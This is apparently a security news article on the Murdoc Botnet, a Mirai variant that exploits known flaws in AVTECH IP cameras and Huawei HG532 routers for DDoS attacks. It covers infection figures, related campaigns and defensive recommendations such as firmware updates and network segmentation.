Cybersecurity researchers have raised alarms about a large-scale campaign exploiting vulnerabilities in AVTECH IP cameras and Huawei HG532 routers. This campaign has been linked to a Mirai botnet variant known as the Murdoc Botnet. According to Shilpesh Trivedi, a security researcher at Qualys, the ongoing activity demonstrates advanced capabilities, targeting security flaws to compromise devices and establish expansive botnet networks.
Campaign Overview
The Murdoc Botnet campaign has been active since at least July 2024, with over 1,370 systems infected so far. A significant number of these infections have been identified in Malaysia, Mexico, Thailand, Indonesia, and Vietnam. The attackers leverage known vulnerabilities, including CVE-2017-17215 and CVE-2024-7029, to gain initial access to Internet of Things (IoT) devices. Once access is gained, a shell script is deployed to download and execute the botnet malware, tailored to the specific CPU architecture of the device.
The primary objective of these attacks is to weaponize the botnet for distributed denial-of-service (DDoS) attacks, which can cripple targeted networks and systems.
Exposure and Impact
A search on the Censys exposure management platform revealed that more than 37,995 AVTECH cameras are currently exposed online. These devices are predominantly located in Taiwan, Vietnam, Indonesia, the United States, and Sri Lanka.
The Murdoc Botnet campaign follows a series of similar incidents involving Mirai botnet variants. For instance:
- gayfemboy Botnet: Exploited a newly disclosed vulnerability in Four-Faith industrial routers in November 2024.
- CVE-2024-7029 Exploitation: Malicious actors enlisted AVTECH devices into a botnet in mid-2024.
- Japanese DDoS Attacks: Major corporations and banks in Japan faced large-scale DDoS attacks by the end of 2024. Targets also included organizations in the U.S., Bahrain, Poland, Spain, Israel, and Russia.
Botnet Operations
The DDoS attacks primarily target sectors such as telecommunications, technology, hosting, cloud computing, banking, gaming, and financial services. Currently, over 55% of compromised devices are located in India, followed by South Africa, Brazil, Bangladesh, and Kenya.
The Murdoc Botnet comprises malware variants derived from Mirai and BASHLITE. These malware strains are capable of executing multiple DDoS attack methods, updating malware, and enabling proxy services. The attacks typically involve infiltrating IoT devices, deploying a loader malware to fetch the main payload, and connecting to a command-and-control (C2) server for further instructions.
Recommendations for Protection
To mitigate the risks posed by the Murdoc Botnet and similar campaigns, cybersecurity experts recommend the following measures:
- Monitor Activity: Regularly monitor for suspicious processes, events, and network traffic generated by untrusted binaries or scripts.
- Apply Firmware Updates: Ensure all IoT devices run the latest firmware versions to patch known vulnerabilities.
- Secure Credentials: Change default usernames and passwords to strong, unique combinations.
- Network Segmentation: Isolate IoT devices from critical infrastructure to limit lateral movement in the event of compromise.
- Deploy Security Solutions: Utilize intrusion detection and prevention systems to identify and block malicious activity.
Conclusion
The Murdoc Botnet campaign underscores the persistent threat posed by IoT vulnerabilities. With attackers continuously evolving their tactics, organizations and individuals must remain vigilant, adopting robust security practices to safeguard their devices and networks. Failure to do so could result in severe disruptions, particularly for industries reliant on IoT technology.
